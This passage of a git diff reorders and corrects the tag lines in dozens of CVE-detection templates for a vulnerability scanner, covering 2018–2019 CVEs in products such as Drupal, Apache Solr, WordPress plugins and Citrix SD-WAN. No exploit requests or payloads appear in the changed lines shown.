- tags: cve,cve2018,uwsgi,php,lfi,plugin,edb,unbit
+ tags: cve2018,cve,uwsgi,php,lfi,plugin,edb,unbit
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml
index eb73186752..d81268565c 100644
--- a/http/cves/2018/CVE-2018-7602.yaml
+++ b/http/cves/2018/CVE-2018-7602.yaml
@@ -27,7 +27,7 @@ info:
vendor: drupal
product: drupal
shodan-query: http.component:"drupal"
- tags: cve2018,drupal,authenticated,kev,vulhub,edb,cve
+ tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml
index f9ef28680d..a39a273505 100644
--- a/http/cves/2018/CVE-2018-7653.yaml
+++ b/http/cves/2018/CVE-2018-7653.yaml
@@ -25,7 +25,7 @@ info:
product: yzmcms
shodan-query: title:"YzmCMS"
fofa-query: title="YzmCMS"
- tags: packetstorm,cve,cve2018,yzmcms,cms,xss
+ tags: cve,cve2018,packetstorm,yzmcms,cms,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml
index f8a9a3f35d..2a3a46a272 100644
--- a/http/cves/2018/CVE-2018-7662.yaml
+++ b/http/cves/2018/CVE-2018-7662.yaml
@@ -24,7 +24,7 @@ info:
max-request: 2
vendor: couchcms
product: couch
- tags: couchcms,fpd,cve,cve2018
+ tags: cve2018,cve,couchcms,fpd
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml
index bb6864a140..1d557cc4c0 100644
--- a/http/cves/2018/CVE-2018-7719.yaml
+++ b/http/cves/2018/CVE-2018-7719.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: acrolinx
product: acrolinx_server
- tags: cve,cve2018,acrolinx,lfi,packetstorm,edb
+ tags: cve2018,cve,acrolinx,lfi,packetstorm,edb
http:
- raw:
diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml
index a620724c0a..981be00118 100644
--- a/http/cves/2018/CVE-2018-8006.yaml
+++ b/http/cves/2018/CVE-2018-8006.yaml
@@ -32,7 +32,7 @@ info:
max-request: 1
vendor: apache
product: activemq
- tags: cve,cve2018,apache,activemq,xss
+ tags: cve2018,cve,apache,activemq,xss
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml
index 15090a4595..4e781fc9b2 100644
--- a/http/cves/2018/CVE-2018-8719.yaml
+++ b/http/cves/2018/CVE-2018-8719.yaml
@@ -28,7 +28,7 @@ info:
vendor: wpsecurityauditlog
product: wp_security_audit_log
framework: wordpress
- tags: cve2018,exposure,edb,wordpress,wp-plugin,cve,wpsecurityauditlog
+ tags: cve,cve2018,exposure,edb,wordpress,wp-plugin,wpsecurityauditlog
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml
index 2fbfc41994..de452eb30b 100644
--- a/http/cves/2018/CVE-2018-8823.yaml
+++ b/http/cves/2018/CVE-2018-8823.yaml
@@ -24,7 +24,7 @@ info:
framework: prestashop
shodan-query: http.component:"prestashop"
verified: true
- tags: cve,cve2018,prestashop,rce
+ tags: cve2018,cve,prestashop,rce,sqli,responsive_mega_menu_pro_project
variables:
num: "999999999"
diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml
index bc15a47160..80e36b5382 100644
--- a/http/cves/2018/CVE-2018-9118.yaml
+++ b/http/cves/2018/CVE-2018-9118.yaml
@@ -28,7 +28,7 @@ info:
vendor: 99robots
product: wp_background_takeover_advertisements
framework: wordpress
- tags: edb,cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp,99robots
+ tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml
index 8752fb8d70..fc2f45ac50 100644
--- a/http/cves/2018/CVE-2018-9161.yaml
+++ b/http/cves/2018/CVE-2018-9161.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: prismaindustriale
product: checkweigher_prismaweb
- tags: cve,cve2018,prismaweb,exposure,edb,prismaindustriale
+ tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale
http:
- method: GET
diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml
index c1775e56b1..371158eaa3 100644
--- a/http/cves/2018/CVE-2018-9845.yaml
+++ b/http/cves/2018/CVE-2018-9845.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: etherpad
product: etherpad_lite
- tags: cve,cve2018,etherpad,auth-bypass
+ tags: cve2018,cve,etherpad,auth-bypass
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml
index 4acec11a92..3263ca4db7 100644
--- a/http/cves/2019/CVE-2019-0193.yaml
+++ b/http/cves/2019/CVE-2019-0193.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: apache
product: solr
- tags: cve2019,apache,rce,solr,oast,kev,vulhub,cve
+ tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml
index 4070490e52..96cb7670ea 100644
--- a/http/cves/2019/CVE-2019-0221.yaml
+++ b/http/cves/2019/CVE-2019-0221.yaml
@@ -29,7 +29,7 @@ info:
vendor: apache
product: tomcat
shodan-query: title:"Apache Tomcat"
- tags: apache,xss,tomcat,seclists,edb,cve,cve2019
+ tags: cve2019,cve,apache,xss,tomcat,seclists,edb
variables:
payload: ""
diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml
index 9da37eb56b..763a72de45 100644
--- a/http/cves/2019/CVE-2019-0230.yaml
+++ b/http/cves/2019/CVE-2019-0230.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: apache
product: struts
- tags: tenable,packetstorm,struts,rce,cve,cve2019,apache
+ tags: cve,cve2019,tenable,packetstorm,struts,rce,apache
variables:
str: "{{rand_base(6)}}"
diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml
index a736620099..cd32b61c10 100644
--- a/http/cves/2019/CVE-2019-10068.yaml
+++ b/http/cves/2019/CVE-2019-10068.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: kentico
product: kentico
- tags: cve2019,kentico,iis,packetstorm,cve,rce,deserialization,kev,msf
+ tags: cve,cve2019,kentico,iis,packetstorm,rce,deserialization,kev,msf
http:
- method: POST
diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml
index cf69a18157..c3ede1e27f 100644
--- a/http/cves/2019/CVE-2019-1010290.yaml
+++ b/http/cves/2019/CVE-2019-1010290.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: cmsmadesimple
product: bable\
- tags: cve,cve2019,redirect,babel,cmsmadesimple
+ tags: cve2019,cve,redirect,babel,cmsmadesimple
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml
index 4f7efb9038..12792ae95e 100644
--- a/http/cves/2019/CVE-2019-10692.yaml
+++ b/http/cves/2019/CVE-2019-10692.yaml
@@ -29,7 +29,7 @@ info:
vendor: codecabin
product: wp_go_maps
framework: wordpress
- tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin
+ tags: cve2019,cve,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml
index 4eabf9076d..7f429762b0 100644
--- a/http/cves/2019/CVE-2019-10717.yaml
+++ b/http/cves/2019/CVE-2019-10717.yaml
@@ -29,7 +29,7 @@ info:
vendor: dotnetblogengine
product: blogengine.net
shodan-query: http.html:"Blogengine.net"
- tags: seclists,cve,cve2019,blogengine,lfi,traversal,dotnetblogengine
+ tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml
index 5772f03f2a..8761c87267 100644
--- a/http/cves/2019/CVE-2019-10758.yaml
+++ b/http/cves/2019/CVE-2019-10758.yaml
@@ -25,7 +25,7 @@ info:
product: mongo-express
framework: node.js
shodan-query: http.title:"Mongo Express"
- tags: vulhub,cve,cve2019,mongo,mongo-express,kev,mongo-express_project,node.js
+ tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml
index c077405ffc..b509fec0b6 100644
--- a/http/cves/2019/CVE-2019-11013.yaml
+++ b/http/cves/2019/CVE-2019-11013.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: softvelum
product: nimble_streamer
- tags: cve2019,lfi,nimble,edb,packetstorm,cve,softvelum
+ tags: cve,cve2019,lfi,nimble,edb,packetstorm,softvelum
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml
index 33acc1e253..7e79f7f13f 100644
--- a/http/cves/2019/CVE-2019-11248.yaml
+++ b/http/cves/2019/CVE-2019-11248.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: kubernetes
product: kubernetes
- tags: cve,cve2019,debug,kubernetes,kubelet,devops,unauth,disclosure
+ tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml
index 5ee2534156..160a3bb0c9 100644
--- a/http/cves/2019/CVE-2019-11370.yaml
+++ b/http/cves/2019/CVE-2019-11370.yaml
@@ -28,7 +28,7 @@ info:
vendor: carel
product: pcoweb_card_firmware
shodan-query: http.html:"pCOWeb"
- tags: pcoweb,xss,carel,edb,cve,cve2019
+ tags: cve,cve2019,pcoweb,xss,carel,edb
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml
index 978081ad92..602e204cc2 100644
--- a/http/cves/2019/CVE-2019-11510.yaml
+++ b/http/cves/2019/CVE-2019-11510.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: pulsesecure
product: pulse_connect_secure
- tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev
+ tags: cve,cve2019,packetstorm,pulsesecure,lfi,kev
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml
index 4be6e3ee75..8b84b79902 100644
--- a/http/cves/2019/CVE-2019-11869.yaml
+++ b/http/cves/2019/CVE-2019-11869.yaml
@@ -34,7 +34,7 @@ info:
vendor: yuzopro
product: yuzo
framework: wordpress
- tags: wpscan,cve,cve2019,wordpress,wp-plugin,xss,yuzopro
+ tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml
index 4202ecbcd2..a4304ff48f 100644
--- a/http/cves/2019/CVE-2019-12276.yaml
+++ b/http/cves/2019/CVE-2019-12276.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: grandnode
product: grandnode
- tags: packetstorm,cve,cve2019,lfi,grandnode
+ tags: cve,cve2019,packetstorm,lfi,grandnode
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml
index 9e821cf84a..a2571a41e7 100644
--- a/http/cves/2019/CVE-2019-12583.yaml
+++ b/http/cves/2019/CVE-2019-12583.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: zyxel
product: uag2100_firmware
- tags: cve,cve2019,zyxel,zywall
+ tags: cve,cve2019,zyxel,zywall,xss
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml
index b140cff091..840c781d2a 100644
--- a/http/cves/2019/CVE-2019-12593.yaml
+++ b/http/cves/2019/CVE-2019-12593.yaml
@@ -29,7 +29,7 @@ info:
product: mail_server
shodan-query: title:"icewarp"
google-query: Powered By IceWarp 10.4.4
- tags: packetstorm,cve,cve2019,lfi,icewarp
+ tags: cve,cve2019,packetstorm,lfi,icewarp
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml
index 9f0d0e6d32..290fc77389 100644
--- a/http/cves/2019/CVE-2019-12616.yaml
+++ b/http/cves/2019/CVE-2019-12616.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: phpmyadmin
product: phpmyadmin
- tags: csrf,edb,cve,cve2019,phpmyadmin
+ tags: cve2019,cve,csrf,edb,phpmyadmin
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml
index 4b8595df6c..76bb51011f 100644
--- a/http/cves/2019/CVE-2019-12725.yaml
+++ b/http/cves/2019/CVE-2019-12725.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: zeroshell
product: zeroshell
- tags: packetstorm,cve,cve2019,rce,zeroshell
+ tags: cve,cve2019,packetstorm,rce,zeroshell
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml
index 393ec0f130..ebfc38c087 100644
--- a/http/cves/2019/CVE-2019-12962.yaml
+++ b/http/cves/2019/CVE-2019-12962.yaml
@@ -27,7 +27,7 @@ info:
vendor: livezilla
product: livezilla
shodan-query: http.html:LiveZilla
- tags: xss,edb,packetstorm,cve,cve2019,livezilla
+ tags: cve,cve2019,xss,edb,packetstorm,livezilla
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml
index 067f58cf66..f88b4523b2 100644
--- a/http/cves/2019/CVE-2019-12986.yaml
+++ b/http/cves/2019/CVE-2019-12986.yaml
@@ -27,7 +27,7 @@ info:
vendor: citrix
product: netscaler_sd-wan
shodan-query: http.title:"Citrix SD-WAN"
- tags: unauth,oast,tenable,cve,cve2019,citrix,rce
+ tags: cve2019,cve,unauth,oast,tenable,citrix,rce
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml
index 7fd626326c..7ab60de095 100644
--- a/http/cves/2019/CVE-2019-12987.yaml
+++ b/http/cves/2019/CVE-2019-12987.yaml
@@ -27,7 +27,7 @@ info:
vendor: citrix
product: netscaler_sd-wan
shodan-query: http.title:"Citrix SD-WAN"
- tags: citrix,rce,unauth,oast,tenable,cve,cve2019
+ tags: cve,cve2019,citrix,rce,unauth,oast,tenable
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml
index ff3b0942b3..a94a19bc7b 100644
--- a/http/cves/2019/CVE-2019-12988.yaml
+++ b/http/cves/2019/CVE-2019-12988.yaml
@@ -27,7 +27,7 @@ info:
vendor: citrix
product: netscaler_sd-wan
shodan-query: http.title:"Citrix SD-WAN"
- tags: rce,unauth,oast,tenable,cve,cve2019,citrix
+ tags: cve,cve2019,rce,unauth,oast,tenable,citrix
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml
index 6306d436ba..fe89a2d21e 100644
--- a/http/cves/2019/CVE-2019-13101.yaml
+++ b/http/cves/2019/CVE-2019-13101.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: dlink
product: dir-600m_firmware
- tags: packetstorm,edb,cve,cve2019,dlink,router,iot
+ tags: cve2019,cve,packetstorm,edb,dlink,router,iot
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml
index 9a3a862227..ef4b147659 100644
--- a/http/cves/2019/CVE-2019-14312.yaml
+++ b/http/cves/2019/CVE-2019-14312.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: aptana
product: jaxer
- tags: cve,cve2019,lfi,edb,packetstorm,aptana
+ tags: cve2019,cve,lfi,edb,packetstorm,aptana
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml
index 9669cb0ead..f725dbe8b6 100644
--- a/http/cves/2019/CVE-2019-14322.yaml
+++ b/http/cves/2019/CVE-2019-14322.yaml
@@ -26,7 +26,7 @@ info:
max-request: 3
vendor: palletsprojects
product: werkzeug
- tags: cve2019,lfi,odoo,packetstorm,cve,palletsprojects
+ tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml
index 0ecfd3be76..94ef01d253 100644
--- a/http/cves/2019/CVE-2019-14470.yaml
+++ b/http/cves/2019/CVE-2019-14470.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: instagram-php-api_project
product: instagram-php-api
- tags: wordpress,xss,wp-plugin,wpscan,packetstorm,cve,cve2019,instagram-php-api_project
+ tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,packetstorm,instagram-php-api_project
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml
index ae235e166b..d64c3c42bf 100644
--- a/http/cves/2019/CVE-2019-14530.yaml
+++ b/http/cves/2019/CVE-2019-14530.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: open-emr
product: openemr
- tags: lfi,authenticated,edb,cve,cve2019,openemr,open-emr
+ tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml
index 0ab540fb0b..5eb462745c 100644
--- a/http/cves/2019/CVE-2019-14696.yaml
+++ b/http/cves/2019/CVE-2019-14696.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: open-school
product: open-school
- tags: xss,open-school,packetstorm,cve,cve2019
+ tags: cve,cve2019,xss,open-school,packetstorm
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml
index 4f04b29f73..ae3a0d993b 100644
--- a/http/cves/2019/CVE-2019-14750.yaml
+++ b/http/cves/2019/CVE-2019-14750.yaml
@@ -29,7 +29,7 @@ info:
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
- tags: packetstorm,cve,cve2019,osticket,xss,intrusive
+ tags: cve,cve2019,packetstorm,osticket,xss,intrusive
variables:
user_name: "{{to_lower(rand_text_alphanumeric(6))}}"
user_pass: "{{rand_text_alphanumeric(12)}}"
diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml
index 4c1e0a4166..4e2e0f2adb 100644
--- a/http/cves/2019/CVE-2019-14789.yaml
+++ b/http/cves/2019/CVE-2019-14789.yaml
@@ -29,7 +29,7 @@ info:
vendor: kunalnagar
product: custom_404_pro
framework: wordpress
- tags: wpscan,cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar
+ tags: cve,cve2019,wpscan,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml
index a38c12c3df..8808f2cda5 100644
--- a/http/cves/2019/CVE-2019-14974.yaml
+++ b/http/cves/2019/CVE-2019-14974.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: sugarcrm
product: sugarcrm
- tags: cve2019,xss,sugarcrm,edb,cve
+ tags: cve,cve2019,xss,sugarcrm,edb
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml
index 1cfb7d83d7..6535461cb5 100644
--- a/http/cves/2019/CVE-2019-15107.yaml
+++ b/http/cves/2019/CVE-2019-15107.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: webmin
product: webmin
- tags: packetstorm,cve,cve2019,webmin,rce,kev,edb
+ tags: cve,cve2019,packetstorm,webmin,rce,kev,edb
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml
index cbbde31d75..b2fcdd0934 100644
--- a/http/cves/2019/CVE-2019-15501.yaml
+++ b/http/cves/2019/CVE-2019-15501.yaml
@@ -28,7 +28,7 @@ info:
vendor: lsoft
product: listserv
shodan-query: http.html:"LISTSERV"
- tags: cve,cve2019,xss,listserv,edb,lsoft
+ tags: cve2019,cve,xss,listserv,edb,lsoft
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml
index f21ef7b9a0..a6f82b299a 100644
--- a/http/cves/2019/CVE-2019-15829.yaml
+++ b/http/cves/2019/CVE-2019-15829.yaml
@@ -28,7 +28,7 @@ info:
product: gallery_photoblocks
framework: wordpress
publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
- tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs
+ tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml
index 45e1e8a98e..0e0a2ed143 100644
--- a/http/cves/2019/CVE-2019-15859.yaml
+++ b/http/cves/2019/CVE-2019-15859.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: socomec
product: diris_a-40_firmware
- tags: seclists,packetstorm,cve,cve2019,disclosure,socomec,diris,iot
+ tags: cve,cve2019,seclists,packetstorm,disclosure,socomec,diris,iot
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml
index f4352df685..0cf50d48a0 100644
--- a/http/cves/2019/CVE-2019-15889.yaml
+++ b/http/cves/2019/CVE-2019-15889.yaml
@@ -28,7 +28,7 @@ info:
vendor: wpdownloadmanager
product: wordpress_download_manager
framework: wordpress
- tags: packetstorm,cve,cve2019,wordpress,xss,wp-plugin,wpdownloadmanager
+ tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,wpdownloadmanager
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml
index 5644488f08..9bc14582ee 100644
--- a/http/cves/2019/CVE-2019-16123.yaml
+++ b/http/cves/2019/CVE-2019-16123.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: kartatopia
product: piluscart
- tags: piluscart,lfi,packetstorm,edb,cve,cve2019,kartatopia
+ tags: cve,cve2019,piluscart,lfi,packetstorm,edb,kartatopia
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml
index 0c3d0a7262..4d551755e7 100644
--- a/http/cves/2019/CVE-2019-16278.yaml
+++ b/http/cves/2019/CVE-2019-16278.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: nazgul
product: nostromo_nhttpd
- tags: edb,cve,cve2019,rce,packetstorm,nazgul
+ tags: cve,cve2019,edb,rce,packetstorm,nazgul
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml
index 6e60e634fd..720f790b2a 100644
--- a/http/cves/2019/CVE-2019-16332.yaml
+++ b/http/cves/2019/CVE-2019-16332.yaml
@@ -28,7 +28,7 @@ info:
vendor: api_bearer_auth_project
product: api_bearer_auth
framework: wordpress
- tags: packetstorm,cve,cve2019,wordpress,xss,wp-plugin,auth,api_bearer_auth_project
+ tags: cve,cve2019,packetstorm,wordpress,xss,wp-plugin,auth,api_bearer_auth_project
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml
index 66d9996a3b..eed987ad75 100644
--- a/http/cves/2019/CVE-2019-16525.yaml
+++ b/http/cves/2019/CVE-2019-16525.yaml
@@ -28,7 +28,7 @@ info:
vendor: checklist
product: checklist
framework: wordpress
- tags: xss,wp-plugin,packetstorm,cve,cve2019,wordpress,checklist
+ tags: cve,cve2019,xss,wp-plugin,packetstorm,wordpress,checklist
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml
index b44446be1e..05e5480217 100644
--- a/http/cves/2019/CVE-2019-1653.yaml
+++ b/http/cves/2019/CVE-2019-1653.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: cisco
product: rv320_firmware
- tags: packetstorm,kev,edb,cve,cve2019,cisco,router,exposure
+ tags: cve,cve2019,packetstorm,kev,edb,cisco,router,exposure
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml
index 27bc513444..b77eef5d6f 100644
--- a/http/cves/2019/CVE-2019-16662.yaml
+++ b/http/cves/2019/CVE-2019-16662.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: rconfig
product: rconfig
- tags: intrusive,rconfig,packetstorm,cve,cve2019,rce
+ tags: cve2019,cve,intrusive,rconfig,packetstorm,rce
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml
index a24916a7c8..0d8840b945 100644
--- a/http/cves/2019/CVE-2019-16920.yaml
+++ b/http/cves/2019/CVE-2019-16920.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: dlink
product: dir-655_firmware
- tags: cve,cve2019,dlink,rce,router,unauth,kev
+ tags: cve2019,cve,dlink,rce,router,unauth,kev
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml
index 2dd84dec27..625909c3d4 100644
--- a/http/cves/2019/CVE-2019-16996.yaml
+++ b/http/cves/2019/CVE-2019-16996.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: metinfo
product: metinfo
- tags: metinfo,sqli,cve,cve2019
+ tags: cve2019,cve,metinfo,sqli
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml
index 8c7de1ecdb..9357cd5a84 100644
--- a/http/cves/2019/CVE-2019-16997.yaml
+++ b/http/cves/2019/CVE-2019-16997.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: metinfo
product: metinfo
- tags: metinfo,sqli,cve,cve2019
+ tags: cve,cve2019,metinfo,sqli
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml
index 7aa9199c13..67d5b01463 100644
--- a/http/cves/2019/CVE-2019-17270.yaml
+++ b/http/cves/2019/CVE-2019-17270.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: yachtcontrol
product: yachtcontrol
- tags: rce,yachtcontrol,cve,cve2019,edb,packetstorm
+ tags: cve,cve2019,rce,yachtcontrol,edb,packetstorm
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml
index 43a582a54b..7ce663a329 100644
--- a/http/cves/2019/CVE-2019-17382.yaml
+++ b/http/cves/2019/CVE-2019-17382.yaml
@@ -25,7 +25,7 @@ info:
max-request: 100
vendor: zabbix
product: zabbix
- tags: fuzz,auth-bypass,login,edb,cve,cve2019,zabbix
+ tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml
index 9345749c85..bbe8eff1b6 100644
--- a/http/cves/2019/CVE-2019-17538.yaml
+++ b/http/cves/2019/CVE-2019-17538.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: jnoj
product: jiangnan_online_judge
- tags: cve,cve2019,jnoj,lfi
+ tags: cve2019,cve,jnoj,lfi
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml
index 30cd43c8b8..1a49206f3f 100644
--- a/http/cves/2019/CVE-2019-17558.yaml
+++ b/http/cves/2019/CVE-2019-17558.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: apache
product: solr
- tags: kev,packetstorm,cve,cve2019,apache,rce,solr,oast
+ tags: cve,cve2019,kev,packetstorm,apache,rce,solr,oast
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml
index 480860f922..99e1d19df2 100644
--- a/http/cves/2019/CVE-2019-17574.yaml
+++ b/http/cves/2019/CVE-2019-17574.yaml
@@ -31,7 +31,7 @@ info:
product: popup_maker
framework: wordpress
publicwww-query: "/wp-content/plugins/popup-maker/"
- tags: wpscan,cve,cve2019,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic
